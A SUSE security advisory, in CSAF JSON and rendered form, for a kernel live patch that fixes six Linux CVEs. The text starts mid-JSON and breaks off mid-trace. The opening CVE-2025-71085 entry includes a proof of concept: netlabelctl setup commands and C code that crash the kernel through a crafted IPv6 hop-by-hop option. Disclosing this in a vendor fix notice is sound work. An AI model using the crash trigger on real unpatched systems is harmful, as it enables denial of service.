"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = 
cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_78-default-2-150600.2.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_19-default-4-150700.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T04:33:50Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1100-1
Vulnerability from csaf_suse - Published: 2026-03-26 23:08 - Updated: 2026-03-26 23:08
Summary
Security update for the Linux Kernel (Live Patch 18 for SUSE Linux Enterprise 15 SP6)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 18 for SUSE Linux Enterprise 15 SP6)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.81 fixes various security issues.
The following security issues were fixed:
- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).
- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1100,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1100
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x | — | | Vendor Fix |
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 | — | | Vendor Fix |
Threats
Impact
important
References
34 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 18 for SUSE Linux Enterprise 15 SP6)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 6.4.0-150600.23.81 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-40258: mptcp: fix race condition in mptcp_schedule_work() (bsc#1255053).\n- CVE-2025-40297: net: bridge: fix use-after-free due to MST port state bypass (bsc#1255895).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1100,SUSE-SLE-Module-Live-Patching-15-SP6-2026-1100",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1100-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1100-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261100-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1100-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025012.html"
},
{
"category": "self",
"summary": "SUSE Bug 1255053",
"url": "https://bugzilla.suse.com/1255053"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255895",
"url": "https://bugzilla.suse.com/1255895"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40258 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40258/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 18 for SUSE Linux Enterprise 15 SP6)",
"tracking": {
"current_release_date": "2026-03-26T23:08:12Z",
"generator": {
"date": "2026-03-26T23:08:12Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1100-1",
"initial_release_date": "2026-03-26T23:08:12Z",
"revision_history": [
{
"date": "2026-03-26T23:08:12Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"product_id": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"product_id": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64",
"product": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64",
"product_id": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp6"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP6",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
},
"product_reference": "kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP6"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: bridge: fix use-after-free due to MST port state bypass\n\nsyzbot reported[1] a use-after-free when deleting an expired fdb. It is\ndue to a race condition between learning still happening and a port being\ndeleted, after all its fdbs have been flushed. The port\u0027s state has been\ntoggled to disabled so no learning should happen at that time, but if we\nhave MST enabled, it will bypass the port\u0027s state, that together with VLAN\nfiltering disabled can lead to fdb learning at a time when it shouldn\u0027t\nhappen while the port is being deleted. VLAN filtering must be disabled\nbecause we flush the port VLANs when it\u0027s being deleted which will stop\nlearning. This fix adds a check for the port\u0027s vlan group which is\ninitialized to NULL when the port is getting deleted, that avoids the port\nstate bypass. When MST is enabled there would be a minimal new overhead\nin the fast-path because the port\u0027s vlan group pointer is cache-hot.\n\n[1] https://syzkaller.appspot.com/bug?extid=dd280197f0f7ab3917be",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40297",
"url": "https://www.suse.com/security/cve/CVE-2025-40297"
},
{
"category": "external",
"summary": "SUSE Bug 1255187 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255187"
},
{
"category": "external",
"summary": "SUSE Bug 1255895 for CVE-2025-40297",
"url": "https://bugzilla.suse.com/1255895"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-40297"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP6:kernel-livepatch-6_4_0-150600_23_81-default-2-150600.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T23:08:12Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 